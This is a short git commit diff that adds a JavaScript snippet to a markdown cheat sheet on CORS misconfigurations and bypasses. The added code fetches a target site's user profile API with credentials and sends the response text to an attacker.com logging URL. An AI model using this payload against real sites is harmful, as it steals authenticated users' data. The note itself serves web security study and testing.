Update CORS - Misconfigurations & Bypass.md

2024-08-23 16:44:56 +03:30 · 2024-08-23 16:44:56 +03:30 · fb0c538961
commit fb0c538961
parent 2e9ae87d60
1 changed files with 9 additions and 0 deletions
--- a/Bypass.md
+++ b/Bypass.md
@ -30,6 +30,15 @@ xhr.withCredentials = true;
 xhr.send(null);
 ```

+```javascript
+fetch("https://target.com/api/user/profile", {
+	credentials: "include"
+})
+.then((response) => {
+	document.location = "//attacker.com/log?key={0}".format(response.text());
+});
+```
+
 ```javascript
 fetch(url, {
  credentials: 'include'